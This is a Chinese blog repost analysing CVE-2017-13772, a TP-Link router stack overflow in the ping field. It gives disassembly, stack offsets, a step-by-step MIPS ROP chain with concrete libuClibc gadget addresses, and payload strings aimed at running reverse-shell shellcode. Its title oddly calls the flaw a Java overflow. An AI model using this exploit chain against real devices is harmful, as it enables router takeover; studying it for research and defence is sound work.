java栈溢出漏洞cve,CVE-2017-13772分析及mips栈溢出利用总结

最新推荐文章于 2023-12-08 10:57:52 发布
最新推荐文章于 2023-12-08 10:57:52 发布
阅读量411 收藏
点赞数
文章标签: java栈溢出漏洞cve

838ca0da33c3

1. 前言

本文将分析CVE-2017-13772,并总结mips栈溢出利用的一般思路。

阅读之前需要先了解mips汇编相关知识。

在阅读实践->文章链接

2. CVE-2017-13772漏洞成因

CVE-2017-13772是tp-link的栈溢出漏洞,如果ping功能处输入过长的ip地址会触发漏洞。一般而言,ping功能处我们一般是尝试命令注入,tp-link厂商在字符串过滤方面做得不错,一些特殊字符输入无效,所以这里只能挖掘溢出型漏洞。

IDA搜索定位字符串

838ca0da33c3

loc_453CE8:

la      $t9, httpGetEnv

addiu   $a1, (aPingAddr - 0x570000) # "ping_addr"

jalr    $t9 ; httpGetEnv #http服务器通过httpGetEnv(ping_addr)获取ping_addr字段的值

move    $a0, $s5

lw      $gp, 0x70+var_58($sp)

la      $a1, aDotype # "doType"

la      $t9, httpGetEnv

move    $a0, $s5

jalr    $t9 ; httpGetEnv

move    $s6, $v0 #httpGetEnv(ping_addr)返回值在v0,在上面一句执行之前,会保存在s6

lw      $gp, 0x70+var_58($sp)

la      $a1, aIsnew # "isNew"

la      $t9, httpGetEnv

move    $a0, $s5

jalr    $t9 ; httpGetEnv

move    $s3, $v0

lw      $gp, 0x70+var_58($sp)

beqz    $s6, loc_454640

move    $s0, $v0

接着跟踪s6寄存器,单击一直往下看,直到这里才发现对s6的调用 #ipAddrDispose($s6)

la      $t9, httpGetEnv

la      $a1, aTrhops # "trHops"

jalr    $t9 ; httpGetEnv

move    $a0, $s5

lw      $gp, 0x70+var_58($sp)

nop

la      $t9, atoi

nop

jalr    $t9 ; atoi

move    $a0, $v0

lw      $gp, 0x70+var_58($sp)

move    $a0, $s6

la      $t9, ipAddrDispose #ipAddrDispose($s6)

nop

jalr    $t9 ; ipAddrDispose

move    $s1, $v0

lw      $gp, 0x70+var_58($sp)

beqz    $v0, loc_454280

move    $v1, $v0

跟进ipAddrDispose

接下来分析ipAddrDispose

838ca0da33c3

838ca0da33c3

838ca0da33c3

ipAddrDispose中发生栈溢出的部分反汇编大致如下

void ipAddrDispose(char * pingaddr):

{

char pingaddr_tmp[0x33] = {0};

int len = strlen(pingaddr);

memset(pingaddr_tmp,0, 0x33);

int i=0,j=0;

for(; i

{

if(pingaddr[i]!=' ')

{

pingaddr_tmp[j]=pingaddr[i] // 是这里发生栈溢出

j++;

}

}

strcpy(pingaddr, pingaddr_tmp);//这里只是拷贝回去除空格的字符串到pingaddr

.........

}

从函数一开始分析可得栈的结构如下:

838ca0da33c3

由栈的结构可知我们最后能够控制 s0 s1 ra,并且可以知道覆盖的偏移,pingaddr='A'(0xAC-0xC)+ s0+s1+ra,pingaddr='A'0xA0+ s0+s1+ra,。

3.CVE-2017-13772漏洞利用

3.1 mips漏洞利用流程

mips漏洞利用首先需要sleep(nS)更新codecache,然后才能正确执行栈上的代码

如果想运行反向shell,大致可以思考出这样的流程:

设置a0=1,跳转到sleep函数

获取栈的地址,跳转到栈上执行代码。

3.2 mips跳转

在mips中,跳转的方式有:

1.设置寄存器t9,跳转到寄存器t9。

move    $t9, $s0jalr    $t9 ;

2.在执行完函数func之前,把要跳转的地址address保存在ra寄存器,执行完函数func后可跳转。

move    $t9, $s0             ;函数f()

lw      $ra, ``0x20``+``var_4($sp)  ``#nextcall=address

lw      $s0, ``0x20``+``var_8($sp)

li      $a0, ``2

li      $a1, ``1

move    $a2, $zero

jr      $t9 ;                ;执行完f()之后,跳转到address

addiu   $sp, ``0x20

3.3 利用

在libuClibc-0.9.30.so中寻找部件

#0.第一步覆盖寄存器s0 s1 ra ,s0设置为sleepaddr的地址,ra设置为addr0(0x2AB2E97C)

#1.跳转到addr0(0x2AB2E97C)执行

move    $t9, $s0 #设置t9为sleepaddr

lw      $ra, ``0x20``+``var_4($sp) #从栈中取数据,设置ra=addr1

lw      $s0, ``0x20``+``var_8($sp) #从栈中取数据,设置s0=addr2

li      $a0, ``2 #设置sleep参数为2

li      $a1, ``1

move    $a2, $zero

jr      $t9 ; #跳转执行sleep(2s), 返回时跳转到addr1

addiu   $sp, ``0x20

#2. addr1

addiu   $s2, $sp, ``0x198``+``var_180 #s2指向栈上

move    $a2, $v1

move    $t9, $s0 #t9=s0

jalr    $t9 ; #跳转到addr2

#3. addr2

move    $t9, $s2 #跳转到栈上执行

jalr    $t9 ;

evil_pingaddr =“A”*160 +sleep_func_addr+"AAAA"+addr0+

“B”*0x18+addr2+addr1+nop*0x20+reverseshell_shellcode

手头没有设备验证,但是应该没有大问题。

3.4 如何寻找这些部件,思路是什么?

这里还原我学习->链接

首先,我们自己需要明白:0.数据来自栈;1.我们第一步能控制那些寄存器;2.最终目标为何;3.每次构造的时候要能控制下一步跳转

0.数据来自栈,也就是之后的操作的数据来源是栈,就是跳转地址,参数一类的

1.第一步能控制那些寄存器:前面通过对溢出函数汇编的分析,可以知道能够控制s0,s1,ra,。

2.最终目标为何?sleep(nS)-> reverseshell,关于sleep,请看文章http://xdxd.love/2016/12/09/%E4%B8%80%E4%B8%AAmips%E6%A0%88%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8/

3.每次构造的时候要能控制下一步跳转:前面提到了,设置t9或ra

3.4.1 mipsrop工具基本操作

安装

下载mipsrop.py,放到C:\Program Files (x86)\IDA 6.8\plugins

https://github.com/devttys0/ida/tree/master/plugins/mipsrop

打开一个mips程序,打开插件

838ca0da33c3

####

mipsrop.help()

查看哪些命令可用

mipsrop.find(instruction_string)

#可以找很多自定义的指令

Locates all potential ROP gadgets that contain the specified instruction.

@instruction_string - The instruction you need executed. This can be either a:

o Full instruction - "li $a0, 1"

o Partial instruction - "li $a0"

o Regex instruction - "li $a0, .*"

mipsrop.system()

#用于执行system()函数

Prints a list of gadgets that may be used to call system().

mipsrop.doubles()

如下:如果你能控制多个寄存器s0 s1 s2 s3。。。,需要多次call(没有用过,根据打印结果大致推出其作用),可以用这个。这里都是jal 或者 jalr,类似于

x86中的call(会保存下一条命令的地址到ra)(jr类似于jmp)。

LOAD:000402D0 move $t9, $s0

LOAD:000402D4 jalr $t9 ; strlen

LOAD:000402D8 lw $a0, 0x4C0+var_400($fp)

LOAD:000402DC lw $a1, 0x4C0+var_400($fp)

LOAD:000402E0 addiu $a2, $v0, 1

LOAD:000402E4 move $t9, $s1

LOAD:000402E8 jalr $t9 ; write

LOAD:000402EC move $a0, $s3

LOAD:000402F0 move $t9, $s0

LOAD:000402F4 jalr $t9 ; strlen

Prints a list of all "double jump" gadgets (useful for function calls).

mipsrop.stackfinders()

#将栈的地址放置到寄存器中,之后可以跑到栈上运行

Prints a list of all gadgets that put a stack address into a register.

mipsrop.tails()

#尾部的指令,可以存储栈上的数据到ra 等寄存器,扩充可控的寄存器,用于后续的跳转与设置参数

因为在mips函数结尾,其汇编都是这种:

loc_42224:

lw $ra, 0x30+var_4($sp)

lw $s4, 0x30+var_8($sp)

lw $s3, 0x30+var_C($sp)

lw $s2, 0x30+var_10($sp)

lw $s1, 0x30+var_14($sp)

lw $s0, 0x30+var_18($sp)

jr $t9

addiu $sp, 0x30

Prints a lits of all tail call gadgets (useful for function calls).

mipsrop.set_base()

#比如你在libuClibc-0.9.30.so中找部件,就设置这个so在主程序中的加载基址,这样最后写利用就方便一些。关于如何找加载地址,可以硬件ttl连上去(有的没法到shell),可以改固件,可以用其他漏洞登陆进去,也可以用qemu system模式运行主程序(只要跑起来就够了)。命令是cat /proc/$pid/maps.

Set base address used for display

mipsrop.summary()

Prints a summary of your currently marked ROP gadgets, in alphabetical order by the marked name.To mark a location as a ROP gadget, simply mark the position in IDA (Alt+M) with any name that starts with "ROP".

mipsrop小工具为mips漏洞给利用提供了特定的功能,只要之前学习了mips汇编和mips函数调用的基本流程,就很容易理解每个部件的功能

3.4.2 思路分析

我们在libuClibc-0.9.30.so找部件,其加载基址是0x2aae2000,执行命令Python>mipsrop.set_base(0x2aae2000)

我们能控制s0,s1,ra。

首先目标是执行sleep:1.设置参数 2.跳转到sleep执行

mipsrop.find("li $a0, 1"),当然也可以mipsrop.find("li $a0, .*")

如下图,

Python>mipsrop.find("li $a0, 1")

| Base + Offset = Address | Action | Control Jump |

| 0x2AAE2000 + 0x00029244 = 0x2AB0B244 | li $a0,1 | jalr $s4 |

| 0x2AAE2000 + 0x00055C60 = 0x2AB37C60 | li $a0,1 | jalr $s1 |

| 0x2AAE2000 + 0x000202D0 = 0x2AB022D0 | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003C140 = 0x2AB1E140 | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003C1F8 = 0x2AB1E1F8 | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003CE70 = 0x2AB1EE70 | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003CF94 = 0x2AB1EF94 | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003D034 = 0x2AB1F034 | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003D57C = 0x2AB1F57C | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003D62C = 0x2AB1F62C | li $a0,1 | jr 0x28+var_4($sp) |

| 0x2AAE2000 + 0x0003F1A4 = 0x2AB211A4 | li $a0,1 | jr 0x58+var_4($sp) |

接下来考虑下一步跳转,由于我们可以控制s1,所以看

| 0x2AAE2000 + 0x00055C60 = 0x2AB37C60 | li $a0,1 | jalr $s1 |

Python>mipsrop.find("li $a0, 1")-------------------------------------------------------------------------------------------------------------------------------------------|  Base      + Offset    =  Address      |  Action                                              |  Control Jump                          |-------------------------------------------------------------------------------------------------------------------------------------------|  0x2AAE2000 + 0x00029244 = 0x2AB0B244  |  li $a0,1  |  jalr  $s4                            ||  0x2AAE2000 + 0x00055C60 = 0x2AB37C60  |  li $a0,1  |  jalr  $s1                            ||  0x2AAE2000 + 0x000202D0 = 0x2AB022D0  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003C140 = 0x2AB1E140  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003C1F8 = 0x2AB1E1F8  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003CE70 = 0x2AB1EE70  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003CF94 = 0x2AB1EF94  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003D034 = 0x2AB1F034  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003D57C = 0x2AB1F57C  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003D62C = 0x2AB1F62C  |  li $a0,1  |  jr    0x28+var_4($sp)                ||  0x2AAE2000 + 0x0003F1A4 = 0x2AB211A4  |  li $a0,1  |  jr    0x58+var_4($sp)                |

IDA脚本区域 点击offset 0x00055C60,IDA就可以跳转到指定区域

LOAD:00055C60  li      $a0, 1LOAD:00055C64  move    $t9, $s1LOAD:00055C68  jalr    $t9 ;

如果ra设置为0x00055C60+0x2AAE2000 ,s1一开始直接设置为sleep,就能执行sleep(1)了,当然,没有后续。

如果能够在执行sleep之前设置ra,就可以在执行完sleep跳转到地址ra,所以现在需要在第一步跳转之后设置ra,然后执行sleep(nS).

从栈设置寄存器,使用mipsrop.tails()来查找

作者选择是loc_35840,这一块有点绕,一开始把s1保存到t9,而s1当前指向的就是loc_35840,所以之后还会再跳转一次到loc_35840。在第一次跳转的过程中通过栈设置s1,进而使第二次跳到我们想要的位置 。

loc_35840:move    $t9, $s1lw      $ra, 0x28+var_4($sp)lw      $s1, 0x28+var_8($sp)lw      $s0, 0x28+var_C($sp)addiu  $a0, 0xCjr      $t9addiu  $sp, 0x28 # End of function sub_357E0

过程是:一开始$s1 =loc_35840,然后执行两次,

$t9, $s1                #t9=newaddr=sleeplw      $ra, 0x28+var_4($sp)    #设置ralw      $s1, 0x28+var_8($sp) lw      $s0, 0x28+var_C($sp)  addiu  $a0, 0xCjr      $t9                    #跳转到sleep,这里是jr,所以在执行完sleep之后会返回到raaddiu  $sp, 0x28  #sleep之前sp+=0x28

从一开始溢出跳转到执行完sleep跳转的过程:(注意其中sp寄存器的变化)

#一开始的溢出lw      $ra, 0xE0+var_4($sp)lw      $s1, 0xE0+var_8($sp)lw      $s0, 0xE0+var_C($sp)jr      $raaddiu  $sp, 0xE0 #第一次跳转li      $a0, 1move    $t9, $s1jalr    $t9 ; #执行sleep(a0),并跳转到新的地址move    $t9, $s1                lw      $ra, 0x28+var_4($sp)    lw      $s1, 0x28+var_8($sp)    #设置s1=newaddr=sleeplw      $s0, 0x28+var_C($sp)addiu  $a0, 0xCjr      $t9addiu  $sp, 0x28  #sp+=0x28move    $t9, $s1                #t9=newaddr=sleeplw      $ra, 0x28+var_4($sp)    #设置ralw      $s1, 0x28+var_8($sp) lw      $s0, 0x28+var_C($sp)  addiu  $a0, 0xCjr      $t9                    #跳转到sleep,这里是jr,所以在执行完sleep之后会返回到raaddiu  $sp, 0x28  #sleep之前sp+=0x28

ping_addr=0xA0‘A’+setS0+setS1+SetRA+0x20'A'+sleepaddr+0x28*'A'+NextJUMP(RA)

最后sleep的参数也不是1了,整个利用存在改进的余地。

到此,就执行完sleep并准备跳转到新的地址NextJUMP(RA)了,此时可控的有ra s1 s0.

执行完sleep(nS),并且可以控制接下来的跳转,当前这一步目标达成。

接下来目标是跳转到栈上执行

可以想到,首先需要将栈上的地址存储到寄存器,然后跳转到寄存器执行shellcode

要用到mipsrop.stackfinders()

文章作者选用的是0x000164C0 ,因为可以设置s2指向栈地址,s0可控,s0可控跳转也就可控

| 0x2AAE2000 + 0x000164C0 = 0x2AAF84C0 | addiu $s2,$sp,0x198+var_180 | jalr $s0

addiu  $s2, $sp, 0x198+var_180move    $a2, $v1move    $t9, $s0jalr    $t9 ;

将s2指向了栈地址,所以接下来Python>mipsrop.find("move $t9,$s2")

-------------------------------------------------------------------------------------------------------------------------------------------

| Base + Offset = Address | Action | Control Jump |

------------------------------------------------------------------------------------------------------------------------------------------

| 0x2AAE2000 + 0x000118A4 = 0x2AAF38A4 | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x00011E84 = 0x2AAF3E84 | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x0001E910 = 0x2AB00910 | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x0001E93C = 0x2AB0093C | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x0001E9B8 = 0x2AB009B8 | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x0001E9E0 = 0x2AB009E0 | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x0001EA08 = 0x2AB00A08 | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x0001EA30 = 0x2AB00A30 | move $t9,$s2 | jalr $s2 |

| 0x2AAE2000 + 0x0001EA58 = 0x2AB00A58 | move $t9,$s2 | jalr $s2 |。。。。

最后结果,其中sp的变化需要自己细细体会。

nop = “\x22\x51\x44\x44”

gadg_1 = “\x2A\xB3\x7C\x60”

gadg_2 = “\x2A\xB1\x78\x40”

sleep_addr = “\x2a\xb3\x50\x90”

stack_gadg = “\x2A\xAF\x84\xC0”

call_code = “\x2A\xB2\xDC\xF0″

def first_exploit(url, auth):

rop = “A”*164 + gadg_2  + gadg_1 + “B”*0x20 + sleep_addrrop += “C”*0x20 + call_code + “D”*4 + stack_gadg + nop*0x20 + shellcode

相比于我的可能比较复杂,但是思路其实是清晰的符合逻辑的,我的是找到了一些好用的部件才显得比较简洁。

4.总结

编写mips利用时,应该明白可控的有哪些,目标是什么,如何衔接每一步,结合mips架构自身的特点来构造整个利用,寻找部件可以多找找来个取巧,也可以缺什么补什么。行文匆促,如果错误还请指正。

本文由看雪学院爱中华UpTTT 原创,

我点
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java栈溢出漏洞cve,TP-Link WR841N 栈溢出漏洞CVE-2020-8423)分析
weixin_42132352的博客
03-15 674
简介前段时间 TP-LINK TL-WR841N 设备爆出了一个认证后的栈溢出漏洞,借机复现了一下这个栈溢出漏洞,其有一些在漏洞利用上的小技巧在此和大家分享一下。漏洞信息如下:漏洞编号:CVE-2020-8423漏洞设备:TP-LINK TL-WR841N V10漏洞效果:登陆过路由器web服务admin账户之后可以获取到路由器的shell。漏洞描述:httpd获取参数时的栈溢出导致了覆盖返回地...
java存在溢出攻击吗_缓冲区溢出攻击
weixin_39974882的博客
02-26 679
缓冲区溢出漏洞(Buffer Overflow)是最早被发现也是最基础的软件安全漏洞技术类型之一。缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。一、缓冲区溢出基本概念缓冲区溢出是计算机程序存在的一类内存安全违规类漏...
java栈溢出漏洞cve,PCMan FTP栈溢出漏洞(CVE-2013-4730)
weixin_39712455的博客
03-15 226
CVE-2013-4730是一个基于FTP软件的栈缓冲区溢出漏洞, 允许远程用户构造USER命令超长字符来实现任意代码执行根据提供的POC代码使用idapro和windbg进行分析,首先查看poc.py代码import socket as sfrom sys import argv#if(len(argv) != 4):print "USAGE: %s host [user] [password]...
Java的一个栈溢出问题
qq_52150810的博客
12-20 546
今天,突然想到这样一个问题,以下代码被调用运行时为何会造成栈溢出(StackOverflowError)的错误: public class Constructor { Constructor c = new Constructor(); public static void main(String[] args) { Constructor test = new Constructor(); } } 一般人,初看感觉没啥问题,但是自己在机器上跑了一下,就会
两个栈溢出CVE漏洞实验
qq_43840665的博客
04-19 5398
实验原理 缓冲区溢出概述 定义 缓冲区是指被程序内部使用或存放用户输入的内存区域,而溢出是指计算机向缓冲区填充数据时超出了缓冲区本身的容量,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。 由于堆栈是由内存高地址向内存低地址方向增长,而数组的变量是从内存低地址向高地址方向增长。如果没有对数据的越界进行检查和限制,通过向程序的数组缓冲区写入超出其长度的内容,覆盖堆栈原来的返回地址,就会造成缓冲区溢出,从而破坏程序的堆栈。如果构造特殊的注入向量覆盖返回地址,使程序转而执行恶意代码
CVE-2021-1647 Windows Defender缓冲区溢出导致的任意代码执行漏洞复现
m0_56642842的博客
05-31 713
0x01 漏洞概述 Windows Defender是Windows自带的防护软件,其在对可执行文件进行检测时采用模拟执行的策略进行黑白判定,模拟执行分为两个部分:指令模拟和运行环境模拟。其指令模拟会将程序的响应平台指令(arm/mips/x86等)转换成Defender自己的间指令,然后运行相应的间指令来模拟执行该文件;而运行环境模拟则是对内存系统、文件系统、系统API、DLL等进行模拟。 Defender在进行指令模拟的时候遇到带壳的可执行文件会使用内置的一些方法尝试脱壳,目前支持脱壳的方式有Up
TP-Link Archer A7路由器命令注入漏洞分析利用
systemino的博客
11-27 2218
这篇文章将详细分析和实现CVE-2020-10882远程代码执行的漏洞利用,此漏洞是在Pwn2Own 2019TP-Link Archer C7上的命令注入漏洞。 此漏洞使网络附近的攻击者可以在TP-Link Archer A7 AC1750路由器的受影响版本上安装执行任意代码,利用漏洞不需要任何身份验证。 漏洞成因是tdpServer服务存在特定缺陷,该服务默认情况下侦听UDP端口20002。解析slave_mac参数时,该过程在使用用户执行的系统调用之前未正确验证用户提供的字符串,攻击者可以
nginx HTTP请求远程缓冲区溢出漏洞
weixin_33827965的博客
09-18 1218
漏洞起因边界条件错误影响系统Igor Sysoev nginx 0.8.14 Igor Sysoev nginx 0.7.61 Igor Sysoev nginx 0.6.38 Igor Sysoev nginx 0.5.37不受影响系统Igor Sysoev nginx 0.8.15 Igor Sysoev nginx 0.7.62 Igor Sysoev nginx ...
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
Easy Chat Server栈缓冲区溢出漏洞CVE-2023-4494分析与复现
最新发布
C20220511的博客
12-08 393
漏洞源于使用HTTP GET对register.ghp文件进行访问时,未检查用户提交的username值的长度是否超过限制,从而使栈缓冲区溢出,覆盖其他内存空间,可导致任意代码执行。该函数的功能是释放堆内存空间,从代码可以看出,试图读取一个不存在的地址41414145的数据,导致了异常。从上述的分析可以看出,调用sprintf函数拼接username字段前,没有检查username的长度是否超出限制,并且username字段可控,导致栈溢出,可以覆盖SEH和函数返回地址,导致任意代码执行。
栈溢出攻击技术及实例代码
06-11
包括一个关于栈溢出攻击技术的ppt以及ppt上涉及的源代码程序
栈溢出CVE复现分析CVE-2010-2883)
weixin_40306105的博客
05-03 922
1 实验环境 操作系统:XP SP3 调试器:OllyDbg 反汇编:IDA Pro 7.0 Adobe Reader : 9.3.4 2 漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat的CoolType.dll库在解析字体文件SING表的uniqueName项时存在栈溢出漏洞。 3 实验内容 首先在系统找到问题库文件,也就是xp sp3...
栈溢出漏洞CVE-2020-8423复现
qq_45595732的博客
08-03 2489
TP-Link WR841N 栈溢出漏洞CVE-2020-8423) 第一次搞iot相关,对mips的汇编还不是很熟,先熟悉一下搭环境,之后再去理解原理,这里记录一下环境搭建流程。虽然iot-vulhub已经都做好了docker,但在自己复现的时候还是多多少少会有些问题。 IoT-vulhub基础环境搭建 #安装pip $ curl -s https://bootstrap.pypa.io/get-pip.py | python3 #安装docker #命令行输docker,根据提示安装就行 # 启动
Adobe Reader栈溢出漏洞(CVE-2010-2883)分析
鬼手的博客
06-08 2801
文章目录漏洞描述测试环境静态分析定位触发点分析漏洞成因动态调试获取SING表的入口地址溢出点精心挑选的返回地址JavaScript实现HeapSpray利用ROP链绕过DEP保护漏洞利用流程总结漏洞修复参考资料 这个漏洞是《漏洞战争》里面的第一个漏洞,也是我分析的第一个漏洞。水平有限,如有错误还望各位大佬指正。 漏洞描述 CVE-2010-2883是Adobe Reader和Acrobat的Co...
mips jal指令_CVE-2017-13772分析mips栈溢出利用总结
weixin_39855634的博客
11-20 662
1. 前言本文将分析CVE-2017-13772,并总结mips栈溢出利用的一般思路。阅读之前需要先了解mips汇编相关知识。在阅读实践->文章链接<- 这篇文章,并尝试回溯该文作者的思路,我学到了很多东西。2. CVE-2017-13772漏洞成因CVE-2017-13772是tp-link的栈溢出漏洞,如果ping功能处输入过长的ip地址会触发漏洞。一般而言,ping功能处我们一般...
cve-2018-5767 路由器栈溢出漏洞复现
蚁景网安学院
02-15 1441
‍点击蓝字关注我们一、前言 本文通过arm架构的路由器栈溢出漏洞为例介绍IOT固件分析以及arm架构下的栈溢出利用漏洞产生的原因是未对用户的输入进行合理的限制而直接使用sscanf函数拷...
【kernel exploit】CVE-2022-1015 nftables 栈溢出漏洞分析利用
panhewu9919的博客
07-16 2728
CVE-2022-1015 内核nftables 栈溢出
Java栈溢出(通过故事来学习)
pcaidong_2的专栏
05-07 232
如果程序使用了递归调用,要及时检查程序代码,避免递归调用次数过多,从而引起栈溢出的异常。每次递归调用都会在栈上分配一段空间,所以当递归调用次数过多时,栈的空间被耗尽,从而导致程序崩溃。在程序开发的过程,他并没有注意到递归调用可能会引起栈溢出的问题。一天,这位程序员遇到了一个棘手的问题,他需要对一个较大的数据集进行计算,但是当他运行程序时,程序突然崩溃了,并且抛出了一个栈溢出的异常。这位程序员开始寻求解决方案,他尝试使用尾递归优化和循环来避免递归调用,但是这样会破坏程序的逻辑结构,导致程序难以维护和扩展。
Java核心实操:内存溢出 实战、内存泄漏实战
架构师尼恩
12-18 2074
实操1:使用JVisualVM分析内存溢出OOM,实操2:使用JVisualVM分析内存泄漏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值